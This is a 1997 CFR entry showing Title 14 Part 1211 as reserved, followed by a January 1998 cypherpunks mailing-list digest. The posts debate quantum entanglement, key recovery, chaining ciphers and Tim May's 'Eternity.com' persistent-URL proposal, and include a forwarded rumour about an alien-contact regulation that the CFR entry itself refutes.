[Code of Federal Regulations]
[Title 14, Volume 5, Parts 1200 to end]
[Revised as of January 1, 1997]
>From the U.S. Government Printing Office via GPO Access
[CITE: 14CFR1211]

[Page 75]
 
                     TITLE 14--AERONAUTICS AND SPACE
 
       CHAPTER V--NATIONAL AERONAUTICS AND SPACE ADMINISTRATION
 
PART 1211--[Reserved]

----------

That's the entire entry.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 29 Jan 1998 04:11:58 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Oregon no-knock leads to conflict [CNN]
In-Reply-To: <199801281935.NAA08338@einstein.ssz.com>
Message-ID: <Pine.BSI.3.96.980128195924.10365B-100000@usr07.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 28 Jan 1998, Jim Choate wrote:

    you're absolutely sure they got the identity correct?
    you're absolutely sure it wasn't TC May?

> Forwarded message:
> 
> >                  OFFICER KILLED, 2 WOUNDED IN OREGON SHOOT-OUT
> >                                        
> >       Map of Oregon January 28, 1998
> >      Web posted at: 2:06 p.m. EST (1906 GMT)
> >      
> >      PORTLAND, Oregon (AP) -- One officer was killed and two were wounded
> >      in Portland Tuesday as they forced their way through the door of a
> >      home that neighbors say was stocked with high-powered weapons.
> >      
> >      Police with black body armor and shields surrounded the house and
> >      wounded the lone suspect. He was taken out three hours later and
> >      hospitalized with gunshot wounds to the chest and stomach.
> >      
> >      The suspect, identified as 37-year-old Steven Dons, was stripped by
> >      officers and driven away naked and bleeding on the tailgate of an
> >      armored SWAT van.
> >      
> 
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 10:11:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
In-Reply-To: <199801290055.BAA14039@basement.replay.com>
Message-ID: <199801290203.UAA10294@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



An Entity at Replay writes:
 
> So, you agree with Tim May's statement that:
 
>> All that is revealed is a _correlation_, a kind of structure built
>> into the Universe. Interesting, but not so weird as it seems.  (And
>> this is not any kind of "action at one site instantaneously changing
>> the state far away." No more so than sending two envelopes out, one
>> with a "1" inside and the other with a "0" inside changes things
>> instantaneously.....)
 
> You agree with the foolish statement that the behavior of correlated
> photons is no more weird than sending out two envelopes?  I thought
> you had more sense than that.
 
With correlated branch systems, examination of one branch can disclose
information about another branch which is currently distant from us.
This is no more weird in the quantum mechanical case, than it is in
the classical case.  The envelope analogy is perfectly appropriate.
 
That's not to say that quantum mechanical systems aren't "weird" in
ways that classical systems are not.  It's just that this is not one
of those areas of weirdness.
 
> How do you explain the violation of Bell's theorem in QM?  What is
> your nice, cozy, friendly, un-weird explanation?  I'm curious whether
> you are going to sacrifice locality or reality.  Somehow I think
> you'll have to go beyond what is necessary to explain the behavior of
> envelopes.
 
The wavefunction of the universe is not a physical observable.  I do
not have to sacrifice causality for physical phemonema to have
non-local collapse of the wavefunction when measurements are
performed.  A satisfactory theory of quantum mechanical measurement
does not currently exist, and it has even been conjectured that
gravitation may be the sole force immune from quantum mechanical
superposition, and that this may be the mechanism behind wavefunction
collapse.  There are other hypotheses as well, and the experiments to
distinguish amongst them have yet to be performed.
 
A correct theory of quantum mechanical measurement will disclose the
mechanisms by which things like non-local wavefunction collapse,
quantum teleporation, the quantum eraser effect, and other current
oddities are mediated.  This will undoubtedly involve a deeper
understanding of how quantum gravity works, and perhaps even the
physics underlying the existence of consciousness itself.
 
However, none of this implies in the least that a physical effect is
propagated non-causally across vast distances when a conscious choice
is made to measure one of two non-commuting observables for one of a
pair of "entangled" particles, which, I believe, is what the current
argument is over.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 10:28:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
In-Reply-To: <199801290044.SAA10449@einstein.ssz.com>
Message-ID: <199801290224.UAA10328@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
 
> This is the last I'm going to respond to this.
 
> The photons are 'entangled' which means their states are linked and
> co-dependant.
 
The states are no more "co-dependent" than two copies of the same book
at different locations on the planet are.  The primary difference in
the quantum mechanical case is that because of superposition, each
might be a mixed state of several books, and only the act of measurement
would disclose which one, and that a decision to examine one of
several non-commuting observables might be made after the books had
been produced and were in transit.  This would *NOT* imply in any way
that examination of one book had any physical effect on the other,
although correlation of measurements made on both books might
demonstrate non-local collapse of the QM wavefunction, which is not,
and never has been, a physical quantity.
 
I can think of even a more extreme case.  Suppose I have the same
Barium atom in two laser traps tuned to different excited states and
separated by a distance of 1,000 miles.  I now have a 50/50
superposition of one state here, and a different state 1000 miles
away.
 
Even with the *SAME* particle in two different places, nothing I do to
it in one place is detectable by a scientist in its other location,
and the only correlations which demonstrate non-local effects require
data from measurements from both of them.  

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 29 Jan 1998 05:17:44 +0800
To: cypherpunks@cyberpass.net
Subject: Quantum teleportation and communication
Message-ID: <199801282100.WAA07953@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

> Imagine a pair of photons sent in opposite directions. With different
> polarizations, but "tangled." Observer A measures a polarization of "1."
> 
> He then knows that Observer B will measure "0."
> 
> All that is revealed is a _correlation_, a kind of structure built into the
> Universe. Interesting, but not so weird as it seems.  (And this is not any
> kind of "action at one site instantaneously changing the state far away."
> No more so than sending two envelopes out, one with a "1" inside and the
> other with a "0" inside changes things instantaneously.....)
> 
> No signal sending is possible because neither observer can "change" the
> polarization of a photon.

Tim May knows no more about quantum mechanics than he does about
cryptography.  He is wrong about the nature of the correlation between
the two photons.

Bell's theorem shows that if local realism (a technical concept which is
hard to deny) holds, then when Observer A changes the way he performs
his measurements, what Observer B sees does change.  It is completely
mistaken to think of the "two envelope" analogy as applying to quantum
correlations.  There is something much stranger going on here.

Don't trust what Tim May writes.  He is not only a hypocrite (complaining
about chemistry discussions while adding to an equally off-topic physics
thread), but a fool as well.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Thu, 29 Jan 1998 06:14:04 +0800
To: BOUSTANI <threebbc@club-internet.fr>
Subject: Re: your mail
In-Reply-To: <199801281106.MAA05137@mail.club-internet.fr>
Message-ID: <Pine.LNX.3.96.980128220315.21336A-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



> I learn about you from my teacher. I think he doesn't know you or talk to
> you but he tell us about how to cracked windows 95 .pwl or NT. So i'm
> interested.

By far, the easiest way to crack Windows 95 (or NT) is to put the CD in
the microwave. Watch it snap, crackle, and pop.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Thu, 29 Jan 1998 12:32:10 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Announcement: RPK InvisiMail released on 12 Jan, 1998
In-Reply-To: <199801280047.QAA09732@comsec.com>
Message-ID: <Version.32.19980127213750.00e9aba0@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



A bunch of us cryptographers would really like to attack RPK, but the
documents on the website are slippery enough to make it difficult.  There
is enough unspecified for them to sneak away from any analysis.

If someone were to reverse engineer the RPK cryptosystem from this product,
I would really appreciate it.

Bruce
 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 29 Jan 1998 05:47:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <199801282139.WAA13688@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Nothing in quantum teleportation has been shown to propagate signals
> faster than light. (If you don't believe me, look into it. Start by
> reading the FTL discussions about Bell's Theorem.)

True, but there are some other interesting effects which could be
explained by FTL communication, such as the fact that light diffracted
through two slits shows an interference pattern, even though one of
the slits is farther away than the light travel time from where the
pattern appears.

Then there's the fact that light appears to propegate faster in a region
of space 'starved' of virtual particles by the casimir effect.  That one
is a favorite among warp drive theorists. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 29 Jan 1998 13:38:56 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <ec7833a462a894bdfc345ae18208fb5c@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



What was the URL again? I got that at work and want to re-visit site tonite at home.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 29 Jan 1998 09:01:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
Message-ID: <199801290055.BAA14039@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian writes:

> Anonymous writes:
>  
> > Tim May knows no more about quantum mechanics than he does about
> > cryptography.  He is wrong about the nature of the correlation between
> > the two photons.
>  
> Tim is right.  Please put this lovely cone-shaped hat on and sit on
> the stool in the corner.

So, you agree with Tim May's statement that:

> All that is revealed is a _correlation_, a kind of structure built into the
> Universe. Interesting, but not so weird as it seems.  (And this is not any
> kind of "action at one site instantaneously changing the state far away."
> No more so than sending two envelopes out, one with a "1" inside and the
> other with a "0" inside changes things instantaneously.....)

You agree with the foolish statement that the behavior of correlated
photons is no more weird than sending out two envelopes?  I thought you
had more sense than that.

Are you under the impression that opening envelopes can in any way
violate Bell's inequality, as measuring correlated photons can?  Please!

How do you explain the violation of Bell's theorem in QM?  What is your
nice, cozy, friendly, un-weird explanation?  I'm curious whether you are
going to sacrifice locality or reality.  Somehow I think you'll have to
go beyond what is necessary to explain the behavior of envelopes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 29 Jan 1998 09:04:27 +0800
To: cypherpunks@cyberpass.net
Subject: References to FTL tunneling experiment
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <199801290100.CAA14836@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Phelix wrote:

> I remember seeing on one of those science specials on The learning channel
> (or mabye the Discovery channel) that a professor did figure out
> (accidentally) how to send information faster than light.  The only thing I
> remember about it was the the signal was some kind of music.

http://i02aix1.desy.de/~mpoessel/nimtzeng.html
http://www.npl.washington.edu/AV/altvw75.html
http://www.uni-koeln.de/~abb11/
http://www.aei-potsdam.mpg.de/~mpoessel/nimtzeng.html
http://www.fringeware.com/msg/1996/msg00155.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 29 Jan 1998 12:23:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
Message-ID: <199801290415.FAA08964@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Get a Chemisty 101/2 book. You must have been in the bone head chemistry
>class.

I think you mean `a bone head chemistry class.' My old college book doesn't
have it either, and I took two semesters of the stuff...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 29 Jan 1998 14:14:12 +0800
To: cypherpunks@toad.com
Subject: patent office and key recovery
Message-ID: <3.0.5.32.19980129053039.00798ae0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Bellovin <smb@research.att.com> posted this to cryptography:
---------------------------------------------------------------------
Today's NY Times had an article on how the U.S. Patent and Trademark
Office is gearing up for electronic filing of patent and trademark
applications
(http://www.nytimes.com/library/cyber/week/012698patents.html).  Since
patent applications here are confidential, filings must be encrypted.
And of course, one of the things holding up deployment -- of a system
where a government agency is the legitimate recipient of the message --
is the "need" for key recovery.

	"The agency wants to include a "key recovery" system in the
	software in case the encryption has to be broken."

The mind boggles.

----------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Fri, 30 Jan 1998 01:57:25 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Chaining ciphers
Message-ID: <9801291747.AA26773@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May skribis:
> I don't think 3DES is weak, but chaining-in additional ciphers can't hurt.
> (Just a minor slowdown in encipherment speed, presumably not important for
> some critical uses.)

Yes, that's definitely better for high-confidence long-term archival
stuff than relying on one cipher.  Carl Ellison's suggestion was DES |
tran | nDES | tran | DES, where "tran" is an unkeyed large-block
transposition.

One word of caution (which should be obvious, but can't hurt to repeat it):
if you chain ciphers (e.g. DES | IDEA | 3DES | CAST | Blowfish), be sure to
use separate keys for each of them; otherwise breaking the last one will give
the key to the whole lot.

BTW, I went to look this up in the Cyphernomicon (I sorta think it's
reffed in there), but the first 4 sites I saw on Altavista were all
dead-end broken links.  The Web's ripping... what's the current
Preferred URL?

	Jim Gillogly
	Trewesday, 8 Solmath S.R. 1998, 17:22
	12.19.4.15.18, 9 Edznab 16 Muan, Third Lord of Night


	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Thu, 29 Jan 1998 22:55:02 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: More reasons why Nynex is evil... (fwd)
Message-ID: <Pine.SUN.3.96.980129095445.2815N-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 28 Jan 1998 19:08:27 -0500
From: Salvatore DeNaro <Salvatore_DeNaro@usccmail.lehman.com>
To: Ray Arachelian <sunder@brainlink.com>
Subject: More reasons why Nynex is evil...

http://www.infoworld.com/cgi-bin/displayNew.pl?/metcalfe/metcalfe.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 29 Jan 1998 23:49:12 +0800
To: sunder@sundernet.com (Ray Arachelian)
Subject: Re: Can someone look this up? (fwd)
In-Reply-To: <Pine.SUN.3.96.980128191623.2815J-100000@beast.brainlink.com>
Message-ID: <199801291536.KAA25295@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



http://www.law.cornell.edu/uscode

The UScode online, searchable, indexed.  Way cool reference material.



Ray Arachelian wrote:
| ---------- Forwarded message ----------
| Date: Tue, 27 Jan 1998 21:48:14 -0500
| From: Salvatore Denaro <sal@panix.com>
| To: 'Ray Arachelian' <sunder@brainlink.com>
| Subject: Can someone look this up?
| 
| Can someone on the list look this up?
| 
| ***************************************************************
| If the government has no knowledge of aliens, then why does
| Title 14, Section 1211 of the Code of Federal Regulations,
| implemented on July 16, 1969, make it illegal for U.S.
| citizens to have any contact with extraterrestrials or their
| vehicles?
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 30 Jan 1998 02:51:26 +0800
To: cypherpunks@Algebra.COM
Subject: Persistent URLs Considered Useful
In-Reply-To: <9801291747.AA26773@mentat.com>
Message-ID: <v03102800b0f67987a920@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:47 AM -0800 1/29/98, Jim Gillogly wrote:

>BTW, I went to look this up in the Cyphernomicon (I sorta think it's
>reffed in there), but the first 4 sites I saw on Altavista were all
>dead-end broken links.  The Web's ripping... what's the current
>Preferred URL?

I have no idea. Sometimes I find a site has it, sometimes not. (I'm not
interested in keeping my tens of megs of postings on a Web page. Sosumi.)

The issue of "URL decay" is a very serious one, affecting directly the use
of the Web for footnote citations, legal citations, references, etc.
Scientific or academic articles cannot reliably cite URLs, as they are
likely to decay or vanish or become corrupted over a matter of months, let
alone the years or decades that a technical or academic paper is expected
to last and be read. Call it an archivist's nightmare.

A couple of years ago I floated an idea out to a handful of Bay Area
friends and Cypherpunks, about an idea for an "Eternity.com" service which
would act as a kind of "vanity press" for authors, professors, researchers,
etc., who wanted to know that a document and URL would have a long
persistence, possibly an indefinite persistence.

(At the time I used the "Eternity" name I was not consciously aware of Ross
Anderson's work on his "Eternity" system, though I may have inadvertently
been inspired by his name, which I may have heard on the list or elsewhere.
My notion was a bit different from either his Eternity system or any of the
recent variants, but the name was based on the same idea of perpetual
storage. However, unlike my BlackNet idea, this particular "Eternity" was
not focussed on contraband, illegal, controversial, or black market
information being distributed and preserved. In fact, the expected
customers were mundane academics and corporate users...or vanity
users...anyone, basically, who wanted to know that a paper or document of
theirs could be reliably cited by others and that the citations would not
exhibit the "URL decay" so commonly seen today.)

Like I said, I sent this to a handful of Bay Area friends and Cypherpunks,
mainly to see if they had any comments or interest. I chose at that time
not to send my idea out to the Cypherpunks list, as I had some thoughts
about maybe trying to commercialize the idea....

However, I haven't, so I may as well send this idea along.

Here is the piece I sent out in late '95:

Return-Path: tcmay@got.net
Received: from [205.199.118.202] (tcmay.got.net [205.199.118.202]) by
you.got.net (8.6.9/8.6.9) with SMTP id OAA05317 for <tcmay@got.net>; Fri,
29 Dec 1995 14:30:25 -0800
Date: Fri, 29 Dec 1995 14:30:25 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <ad0998a917021004d556@[205.199.118.202]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: tcmay@got.net
From: tcmay@got.net (Timothy C. May)
Subject: Eternity.com announces "Eternal URLs"--version 1.02
X-UIDL: 820276233.000


***Press Release***

Santa Cruz, CA. Eternity, Inc. is pleased to announce the availability of
its permanent Uniform Resource Locater (URL) facility. For a fee, Eternity
will store a file for a year, for several years, or for "eternity."
Eternity will ensure that backups are escrowed in the event of
interruptions at Eternity or even the demise of Eternity as an entity.
Visit us at

http://www.eternity.com/~products/

***End***

Well, not really. But an example makes a point succinctly.

There's a growing need for "eternal URLs," URLs that have enough
persistence to last for a very long time, possibly for several decades.
(And with declining storage costs, "several years" implies "eternity" only
costs 10% more.)

Here are some reasons:

* Today's URLs are transient, fluid. Accounts go away and the URL no longer
works, e.g., the large number of "Can't access" errors when Web surfing.

(Many of these errors are because a server or account has been deliberately
been taken down, for whatever reasons. Often because of overloading, which
is a separable issue from the issue of permanence--overloading can be
handled with access fees, for example.)

* Web citations. Michael Froomkin, and others, have been raising the issue
of using the Web for legal citations. A real problem if the citations don't
persist for very long. (And I started seriously thinking about this Web
transience issue when I wrote a reply to him pointing out the utter
transience of most URLs, the "decay time" of valid URLs and how tough it
would be to rely on the Web for citations which are intended to be valid
for years or even decades.)

* Many links have a "single-point failure" built in. Let me give an example:

- my Cyphernomicon exists in an HTML version (nicely done by J. Rochkind)
at the URL "http://www.oberlin.edu/~brchkind/cyphernomicon/".

- lots of other Web pages have links to this URL. In fact, nearly every
page that mentions the Cyphernomicon points to this URL!

- so, what happens when Jonathan's account--at Oberlin I presume--goes
away? What happens when he gets tired of maintaining it, or graduates, or
whatever?

- answer: all the pages that point to it now come up only with the typical
errors.

- it's unlikely that all or even most of the pages with pointers to this
now-gone URL will update them. I call this "Web decay."

Thus, we see the increasing breakage of links. (I don't know about you
folks, but in my Web surfing I find more and more links broken every
day....)

A market fix might be the following:

- a site operator offers "archival" storage, perhaps/probably for a fee

- files could be placed in this archival storage for some fee for a given
amount of time. (Given the declining cost of storage, a user might be able
to economically buy "permanent" storage, sort of a "discounted future
value" approach. Thus, I might pay $20 to store the Cyphernomicon for a
year, $30 for 3 years, and $50 for "eternity."

- he may also charge digital cash for access (a separable issue, but worth
mentioning)

- example URL: "http://www.eternity.com/~cypherpunks/cyphernomicon/"

- the site, "eternity.com" in this example, would ensure that the document
remains mounted and available for years, decades, etc. This could be done
by using backup machines, copies of optical disks at services which agree
(for a fee) to keep backups and mount them in the event of
disruption/bankruptcy/etc. of "eternity.com," and so on. (Obviously a fee
structure could include issues of file size, latency of access, policies
for public hits on the site, etc.)

- services like this (and I expect more to appear) may have cross-backup
provisions, or arrangements to take over the good name and good will, and
of course the files, of services which vanish or go bankrupt. (All sorts of
messy details, but familiar to lawyers handling escrow matters.)

- there are obvious similarities with "archival storage" services (the
"data vaults" and salt mine companies). In this case, the archival storage
also has access via the Web attached. (And yes, an obvious wrinkle is to
sell archival storage per se, with access a separate issue: access could be
via passwords/crypto, or via paid access, URLs, etc. All separable. But the
"market focus" on "eternal URLs" is a powerful focus, likely to quickly
generate a fair amount of business.)

(Strategies for site-mirroring of URLs, where the same URL actually
involves multiple sites, is another approach. I'm not following that area
too closely, so I won't discuss it here. It may be a workable alternative.)

Another alternative is for services to arise which act as redirectors of
Web accesses. Without actually storing the Cyphernomicon file, for example,
they tell users where it actually is. (Not that much different from
Infoseek, DejaNews, Alta Vista, etc., except that those services merely
index existing pages, which may have huge numbers of corrupt links, while
the service I am proposing would take active steps to ensure valid copies
can be accessed...probably too much work to be economical, which is why I
prefer the "Eternity.com" model: the owner of a URL, or an interested party
who wishes to pay to store a copy, takes active steps to ensure a permanent
copy exists.

There are all sorts of wrinkles of this idea, such as:

-- newer versions of a file, e.g., the "Cyphernomicon v.1.5," are either
stored separately, with pointers added to the first file, or are appended.
I favor the "pure archive" approach of always having the earlier versions
stored. ("Once stored, it is never forgotten.") For example:

"http://www.eternity.com/~cypherpunks/cyphernomicon/0.666" (the original)
"http://www.eternity.com/~cypherpunks/cyphernomicon/1.5"
"http://www.eternity.com/~cypherpunks/cyphernomicon/2.0"
...etc....

-- obviously files could be stored in various ways, depending on fees per
storage and fees per access. Older versions might be archived on DAT (or
its 2005 equivalent), more recent versions might be on DVDs, CD-ROMs, etc.,
and heavily-accessed files might be on magnetic disk. All a matter of
pricing, usage, market issues.

-- jukeboxes of CD-ROMs, DATs, and DVDs should make storage of "archived
Web sites" very cheap.

-- such a service could also be a protection against political pressure:
once a file is stored, perhaps in multiple national jurisdicitions, or
perhaps even in unknown jurisdictions via Web mixes, the file could not be
removed.

-- digital timestamps and other hashes of the database could be published,
a la Haber and Stornetta's Surety service, to ensure that that the database
had not been tampered with.

-- secure data havens, such as Swiss banks (maybe not so secure, but you
get the point) could store copies of the files, perhaps on very slow media.
Enough to ensure eternal storage. Underground vaults, salt mines, the usual
shtick.

I'll close for now.

Could "Eternity.com" be the new Westlaw? (For you nonlawyers, Westlaw
publishes books of court cases and rulings, and is the de facto place for
references...they make a tidy profit by licensing their system. Cyberspace
legal thinkers are looking at Web alternatives.)

Food for thought (and grounds for further research, as Dave Emory would say).


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 29 Jan 1998 19:06:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
Message-ID: <199801291045.LAA19417@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian writes:

> An Entity at Replay writes:
>  
> > You agree with the foolish statement that the behavior of correlated
> > photons is no more weird than sending out two envelopes?  I thought
> > you had more sense than that.
>  
> With correlated branch systems, examination of one branch can disclose
> information about another branch which is currently distant from us.
> This is no more weird in the quantum mechanical case, than it is in
> the classical case.  The envelope analogy is perfectly appropriate.
>  
> That's not to say that quantum mechanical systems aren't "weird" in
> ways that classical systems are not.  It's just that this is not one
> of those areas of weirdness.

It's much worse than this.  The violation of Bell's inequality implies
that changes to the basis used to measure one particle cause changes in
the observed state of the remote particle.  Of course this can't be used
to transmit information; we all agree on that.  The remote particle has
a random orientation.  But the point is, Bell's theorem shows that the
remote orientation depends on how the local measurement is done.

This is not a matter of simply perceiving or deducing what the conditions
are at the remote branch, as in the envelope case.  A better analogy
would be an envelope which could be opened in two ways, from the top
or from the bottom.  If you open from the top then the remote envelope
will have the same contents as the local one, while if you open from
the bottom then the remote envelope will have the opposite contents.
In each case the contents are random; the remote observer has no
idea whether you opened from the top or the bottom.  But somehow
your decision on how to open the envelope (what basis to measure the
photon) is changing how these globally separated subsystems relate to
each other.  (This analogy isn't perfect, either, because it might seem
that magic changes to the local contents could make the envelope work.
Bell's reasoning shows that it is the remote photon's state which must
be altered by the choice of how to measure the local one.)

This is the fundamental flaw in the envelope analogy, which makes it
seriously flawed and misleading.  It gives the impression that some kind
of hidden variables (the contents within the envelope) can easily solve
the problem, when nothing could be further from the truth.  It papers
over one of the most mysterious facets of quantum mechanics, by making it
appear to be mundane.  It represents a fundamentally mistaken way to view
remote correlated particles.

> > How do you explain the violation of Bell's theorem in QM?  What is
> > your nice, cozy, friendly, un-weird explanation?  I'm curious whether
> > you are going to sacrifice locality or reality.  Somehow I think
> > you'll have to go beyond what is necessary to explain the behavior of
> > envelopes.
>  
> The wavefunction of the universe is not a physical observable.  I do
> not have to sacrifice causality for physical phemonema to have
> non-local collapse of the wavefunction when measurements are
> performed.  A satisfactory theory of quantum mechanical measurement
> does not currently exist, and it has even been conjectured that
> gravitation may be the sole force immune from quantum mechanical
> superposition, and that this may be the mechanism behind wavefunction
> collapse.  There are other hypotheses as well, and the experiments to
> distinguish amongst them have yet to be performed.
>  
> A correct theory of quantum mechanical measurement will disclose the
> mechanisms by which things like non-local wavefunction collapse,
> quantum teleporation, the quantum eraser effect, and other current
> oddities are mediated.  This will undoubtedly involve a deeper
> understanding of how quantum gravity works, and perhaps even the
> physics underlying the existence of consciousness itself.

OK, so you can't explain it.  Fine, it is indeed a mysterious phenomenon,
and no doubt you are correct that more insights will come in the future.

Now, compare this with the envelope analogy Tim May offered:

>> All that is revealed is a _correlation_, a kind of structure built
>> into the Universe. Interesting, but not so weird as it seems.  (And
>> this is not any kind of "action at one site instantaneously changing
>> the state far away." No more so than sending two envelopes out, one
>> with a "1" inside and the other with a "0" inside changes things
>> instantaneously.....)

Are you at all tempted to resort to such language in trying to understand
how the envelopes could work?  Is it puzzling how we could open one here
and find a 1 and suddenly know that there is a 0 in the remote envelope?
Do we need to learn more about how measurements of envelope contents work
before we can begin to tackle this thorny philosophical conundrum?

Of course not!  The envelope case is transparently obvious.  There are
no puzzles here, no complexities, no confusion.  The only confusion
is in the minds of those who think that correlated envelopes have
anything to do with correlated photons, or that the hidden variables
which perfectly well explain what is happening with the envelopes shed
any light whatsoever on the workings of nonlocal QM systems.

> However, none of this implies in the least that a physical effect is
> propagated non-causally across vast distances when a conscious choice
> is made to measure one of two non-commuting observables for one of a
> pair of "entangled" particles, which, I believe, is what the current
> argument is over.

No, the current argument is over how much of a jackass Tim May is.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 30 Jan 1998 04:16:56 +0800
To: cypherpunks@Algebra.COM
Subject: Finding the Cyphernomicon
In-Reply-To: <9801291747.AA26773@mentat.com>
Message-ID: <3.0.5.32.19980129120914.007c5530@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>BTW, I went to look this up in the Cyphernomicon (I sorta think it's
>reffed in there), but the first 4 sites I saw on Altavista were all
>dead-end broken links.  The Web's ripping... what's the current
>Preferred URL?

First hit I got at hotbot was the standard one
http://www.oberlin.edu/~brchkind/cyphernomicon/
and it seems to work fine.

Also http://yak.net/CYPHERNOMICON.gz works.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Leonard <jleonard@divcom.umop-ap.com>
Date: Fri, 30 Jan 1998 05:44:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Persistent URLs Considered Useful
In-Reply-To: <9801291747.AA26773@mentat.com>
Message-ID: <19980129133545.11646@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Jan 29, 1998 at 10:44:19AM -0800, Tim May wrote:
> At 9:47 AM -0800 1/29/98, Jim Gillogly wrote:
> 
> >BTW, I went to look this up in the Cyphernomicon (I sorta think it's
> >reffed in there), but the first 4 sites I saw on Altavista were all
> >dead-end broken links.  The Web's ripping... what's the current
> >Preferred URL?
> 
> I have no idea. Sometimes I find a site has it, sometimes not. (I'm not
> interested in keeping my tens of megs of postings on a Web page. Sosumi.)

I've copied the HTML'd version at http://www.slimy.com/crypto/cyphernomicon/.
Barring catastrope, it'll stay there until the singularity.

> The issue of "URL decay" is a very serious one, affecting directly the use
